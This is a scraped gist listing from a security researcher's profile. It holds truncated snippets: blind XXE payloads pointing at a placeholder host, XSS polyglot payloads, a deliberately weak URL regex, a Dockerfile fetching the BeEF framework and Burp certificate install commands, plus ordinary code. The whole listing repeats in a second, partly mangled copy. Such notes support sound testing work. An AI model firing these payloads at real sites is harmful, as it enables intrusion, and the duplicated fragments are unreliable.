Erlend Oftedal eoftedal

## gist:2046582
var mynamespace = mynamespace || {};

(function(){
	var counter = { count: 0 };
	function incrementCounter(){
		counter.count++;
	}

	mynamespace.someobject = {
		counter : counter,

## regex.rb
a = "javascript:evil();\nhttp://www.vg.no"
if a =~ /^https?/ then
  puts "This is a safe url starting with http or https"
end

## Dockerfile
FROM ubuntu
RUN apt-get update && apt-get upgrade -y && apt-get install -y build-essential libsqlite3-dev sqlite3 libssl-dev curl
RUN apt-get install -y software-properties-common && \
        apt-add-repository -y ppa:brightbox/ruby-ng && \
        apt-get update && \
        apt-get install -y ruby2.1 ruby2.1-dev
WORKDIR /opt/
RUN locale-gen en_US.UTF-8
ENV LC_ALL en_US.UTF-8
RUN     curl https://codeload.github.com/beefproject/beef/tar.gz/beef-0.4.6.1 -o beef-0.4.6.1.tar.gz  && \

## step1
var oldCreateElement = document.createElement;
document.createElement = function() {
    var element = oldCreateElement.apply(document, arguments);
    var oldSetAttribute = element.setAttribute;
    console.log(arguments, element);
    element.setAttribute = function(name, value) {
        if (name == "onsubmit") {
            console.log(arguments.callee.caller.toString());
        }
        oldSetAttribute.apply(element, arguments);

## DI-Dog
public class Dog {
  private Tail tail;
  private Head head;

  public Dog() {
    this(new TailImpl(), new HeadImpl())
  }
  public Dog(Tail tail, Head head) {
    this.tail = tail;
    this.head = head;

## SelfVerify.java
package no.posten.dpost.sosm;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.security.AccessController;
import java.security.CodeSigner;
import java.security.CodeSource;
import java.security.PrivilegedAction;

## Android burp
http://techblog.vsza.hu/posts/Using_Android_emulator_with_Burp_Suite.html

adb shell mount -o rw,remount /system
openssl x509 -in burp.cer -inform DER -text
openssl x509 -noout -subject_hash_old -inform DER -in burp.cer
adb push burp.cer /system/etc/security/cacerts/9a5ba575.0

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## xss-polyglots.txt
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
javascript:`</template>\"///"//<

## dep-check.sh
#!/bin/bash

export COLOR_NC=$(tput sgr0)
export COLOR_GREEN=$(tput setaf 2)

if [ $# -ne 2 ]; then
    echo "ERROR: no image given"
    echo "USAGE: ./scan.sh <some_image>[:some_tag] <path in image>"
    exit 1
fi
	var mynamespace = mynamespace \|\| {};

	(function(){
	var counter = { count: 0 };
	function incrementCounter(){
	counter.count++;
	}

	mynamespace.someobject = {
	counter : counter,
	a = "javascript:evil();\nhttp://www.vg.no"
	if a =~ /^https?/ then
	puts "This is a safe url starting with http or https"
	end
	FROM ubuntu
	RUN apt-get update && apt-get upgrade -y && apt-get install -y build-essential libsqlite3-dev sqlite3 libssl-dev curl
	RUN apt-get install -y software-properties-common && \
	apt-add-repository -y ppa:brightbox/ruby-ng && \
	apt-get update && \
	apt-get install -y ruby2.1 ruby2.1-dev
	WORKDIR /opt/
	RUN locale-gen en_US.UTF-8
	ENV LC_ALL en_US.UTF-8
	RUN curl https://codeload.github.com/beefproject/beef/tar.gz/beef-0.4.6.1 -o beef-0.4.6.1.tar.gz && \
	var oldCreateElement = document.createElement;
	document.createElement = function() {
	var element = oldCreateElement.apply(document, arguments);
	var oldSetAttribute = element.setAttribute;
	console.log(arguments, element);
	element.setAttribute = function(name, value) {
	if (name == "onsubmit") {
	console.log(arguments.callee.caller.toString());
	}
	oldSetAttribute.apply(element, arguments);
	public class Dog {
	private Tail tail;
	private Head head;

	public Dog() {
	this(new TailImpl(), new HeadImpl())
	}
	public Dog(Tail tail, Head head) {
	this.tail = tail;
	this.head = head;
	package no.posten.dpost.sosm;

	import java.io.ByteArrayInputStream;
	import java.io.IOException;
	import java.io.InputStream;
	import java.net.URL;
	import java.security.AccessController;
	import java.security.CodeSigner;
	import java.security.CodeSource;
	import java.security.PrivilegedAction;
	http://techblog.vsza.hu/posts/Using_Android_emulator_with_Burp_Suite.html

	adb shell mount -o rw,remount /system
	openssl x509 -in burp.cer -inform DER -text
	openssl x509 -noout -subject_hash_old -inform DER -in burp.cer
	adb push burp.cer /system/etc/security/cacerts/9a5ba575.0
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	javascript:"/'/`/--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/<svg/*/onload=alert()//>
	javascript:"/'/`/\" /</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/<html//onmouseover=alert()//>
	javascript:"/\"/`/' /</template></textarea></noembed></noscript></title></style></script>--><svg onload=/<html//onmouseover=alert()//>
	javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/--><html / onmouseover=alert()//'>`
	javascript:`/\"/--><svg onload='/</template></noembed></noscript></style></title></textarea></script><html onmouseover="/*/ alert()//'">`
	javascript:"/'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame / onload=alert()//</script>
	javascript:"/`/\"/'/</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/<i<frame// onload=alert()//</Script>
	javascript:`</template>\"///"//<
	#!/bin/bash

	export COLOR_NC=$(tput sgr0)
	export COLOR_GREEN=$(tput setaf 2)

	if [ $# -ne 2 ]; then
	echo "ERROR: no image given"
	echo "USAGE: ./scan.sh <some_image>[:some_tag] <path in image>"
	exit 1
	fi